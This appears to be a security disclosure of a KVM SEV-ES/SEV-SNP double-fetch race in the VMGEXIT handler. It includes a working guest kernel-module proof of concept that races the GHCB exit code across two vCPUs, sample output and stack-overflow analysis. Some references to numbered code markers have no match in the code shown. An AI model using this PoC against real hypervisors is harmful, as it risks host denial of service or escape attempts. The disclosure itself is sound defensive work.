Summary
A KVM guest using SEV-ES or SEV-SNP with multiple vCPUs can trigger a double fetch race condition vulnerability and invoke the VMGEXIT handler recursively. If an attacker manages to call the handler multiple times, they can theoretically trigger a stack overflow and cause a denial-of-service or potentially guest-to-host escape in kernel configurations without stack guard pages (CONFIG_VMAP_STACK).
Severity
Moderate - could lead to a stack overflow and cause a denial-of-service or potentially guest-to-host escape.
Proof of Concept
The proof of concept enters the VMGEXIT handler with SVM_EXIT_VMGEXIT as the exit code, and then quickly swaps it to SVM_EXIT_INVD to pass the validation. This results in a recursive invocation of svm_invoke_exit_handler with SVM_EXIT_VMGEXIT as exit_code.
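For context, the host side of the race is a classic check-then-use double fetch on the guest-shared GHCB page: the exit code is read once to validate the request and read a second time to dispatch it. The sketch below is a condensed, hypothetical illustration of that pattern as we understand the affected code, not the verbatim KVM source; the helper names handle_vmgexit_sketch(), is_valid_exit_code() and reject_vmgexit() are made up for illustration, and the field layout is approximate.

/* Hypothetical sketch of the double-fetch pattern -- NOT the actual KVM code. */
static int handle_vmgexit_sketch(struct vcpu_svm *svm)
{
        struct ghcb *ghcb = svm->sev_es.ghcb;   /* page shared with the guest */
        u64 exit_code;

        /* First fetch: only used to decide whether the request is valid. */
        if (!is_valid_exit_code(ghcb_get_sw_exit_code(ghcb)))
                return reject_vmgexit(svm);

        /*
         * Second fetch: used for dispatch. Because the GHCB is guest-writable,
         * another vCPU can flip sw_exit_code between the two fetches, so
         * validation may observe SVM_EXIT_INVD while dispatch observes
         * SVM_EXIT_VMGEXIT, which recursively re-enters the VMGEXIT handler
         * through svm_invoke_exit_handler().
         */
        exit_code = ghcb_get_sw_exit_code(ghcb);

        switch (exit_code) {
        /* ... exit codes handled directly ... */
        default:
                return svm_invoke_exit_handler(svm, exit_code);
        }
}

The PoC module below, run inside the guest, races exactly this window from two vCPUs: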
#include <linux/delay.h>
#include <linux/kthread.h>
#include <linux/module.h>
#include <asm/msr-index.h>
#include <asm/sev.h>
#include <asm/svm.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Andy Nguyen");
MODULE_DESCRIPTION("KVM SEV-ES VMGEXIT double fetch race condition");
MODULE_VERSION("1.0");

static inline u64 sev_es_rd_ghcb_msr(void) {
        return __rdmsr(MSR_AMD64_SEV_ES_GHCB);
}

static __always_inline void vc_ghcb_invalidate(struct ghcb *ghcb) {
        ghcb->save.sw_exit_code = 0;
        __builtin_memset(ghcb->save.valid_bitmap, 0, sizeof(ghcb->save.valid_bitmap));
}

/* Thread 1 (pinned to vCPU 1): keep flipping sw_exit_code (offset 0x390 in
 * the GHCB) between SVM_EXIT_VMGEXIT and SVM_EXIT_INVD while thread 0 is
 * inside the VMGEXIT. */
static int race1_thread(void *ghcb) {
        u64 ghcb_pa;

        ghcb_pa = __pa(ghcb);
        printk(KERN_EMERG "thread 1: ghcb: %p, ghcb_pa: %llx\n", ghcb, ghcb_pa);

        while (1) {
                *(volatile u64 *)(ghcb + 0x390) = SVM_EXIT_VMGEXIT;
                *(volatile u64 *)(ghcb + 0x390) = SVM_EXIT_INVD;
                asm("pause\n");
        }

        return 0;
}

/* Thread 0 (pinned to vCPU 0): repeatedly fill the GHCB with
 * SVM_EXIT_VMGEXIT and issue VMGEXIT, racing against thread 1's writes. */
static int race0_thread(void *arg) {
        struct task_struct *race1_task;
        void *ghcb;
        u64 ghcb_pa;

        ghcb_pa = sev_es_rd_ghcb_msr();
        ghcb = __va(ghcb_pa);
        printk(KERN_EMERG "thread 0: ghcb: %p, ghcb_pa: %llx\n", ghcb, ghcb_pa);

        race1_task = kthread_create(race1_thread, ghcb, "race1");
        kthread_bind(race1_task, 1);
        wake_up_process(race1_task);

        while (1) {
                vc_ghcb_invalidate(ghcb);
                ghcb_set_sw_exit_code(ghcb, SVM_EXIT_VMGEXIT);
                ghcb_set_sw_exit_info_1(ghcb, 0);
                ghcb_set_sw_exit_info_2(ghcb, 0);
                VMGEXIT();
                asm("pause\n");
        }

        return 0;
}

static int __init poc_init(void) {
        struct task_struct *race0_task;

        race0_task = kthread_create(race0_thread, NULL, "race0");
        kthread_bind(race0_task, 0);
        wake_up_process(race0_task);

        return 0;
}

static void __exit poc_exit(void) {}

module_init(poc_init);
module_exit(poc_exit);
We modified the function sev_handle_vmgexit and added the following print to alert when the race condition was successful:

default:
        if (exit_code == SVM_EXIT_VMGEXIT)
                pr_err("Race condition triggered!\n");
        ret = svm_invoke_exit_handler(svm, exit_code);
Running this produces output similar to the following:
[ 3332.177310] SVM: kvm [107255]: vcpu0, guest rIP: 0x0 vmgexit: exit code 0x403 is not valid
[ 3332.307315] SVM: Race condition triggered!
[ 3332.311419] SVM: kvm [107255]: vcpu0, guest rIP: 0x0 vmgexit: exit code 0x76 input is not valid
Further Analysis
If an attacker is able to trigger the recursion multiple times reliably on the same call stack, they can theoretically trigger a stack overflow and cause a denial of service or potentially a guest-to-host escape. Exploiting recursion in the Linux kernel was proven feasible as far back as 2016. Today, however, there are mitigations such as CONFIG_VMAP_STACK that add guard pages to kernel stacks.
Moreover, winning the race reliably in every iteration is very tricky due to the very tight window between the two fetches; they are emitted as consecutive instructions (because of optimization and inlining):
// Corresponds to [2] from code above.
d83: 49 8b 8e 90 03 00 00 mov rcx,QWORD PTR [r14+0x390]
// Corresponds to [3] from code above.
d8a: 4d 8b bc 24 90 03 00 00 mov r15,QWORD PTR [r12+0x390]
A kernel stack on x86-64 is 16384 bytes. In our build, the function sev_handle_vmgexit allocates 64 bytes of stack and svm_invoke_exit_handler allocates 40 bytes, so each level of recursion consumes at least 104 bytes. Not taking into account the stack already used up to that point, we estimate that roughly 100-150 successful races/iterations are needed to overflow the stack.
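As a back-of-the-envelope check on that estimate (assuming, as measured above, only 64 + 40 bytes are consumed per recursion level; the real per-level cost is higher, so this is an upper bound on the achievable depth):

/* Back-of-the-envelope estimate; assumes only the two measured frames
 * (64 + 40 bytes) per recursion level, so the result is an upper bound
 * on the number of successful races needed before the stack overflows. */
#include <stdio.h>

int main(void)
{
        const unsigned long stack_size = 16384;     /* x86-64 kernel stack size */
        const unsigned long per_level  = 64 + 40;   /* sev_handle_vmgexit + svm_invoke_exit_handler */

        printf("upper bound on recursion depth: %lu\n", stack_size / per_level);   /* ~157 */
        return 0;
}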
For the currently work-in-progress KVM SEV-SNP code (not yet upstream), the code has been reorganized, and the race window might be slightly larger and hence easier to win (see [5] and [6] from the code above). However, we have not yet compiled that code to confirm this.
Timeline
Date reported: 05/08/2023
Date fixed: 08/04/2023
Date disclosed: 09/06/2023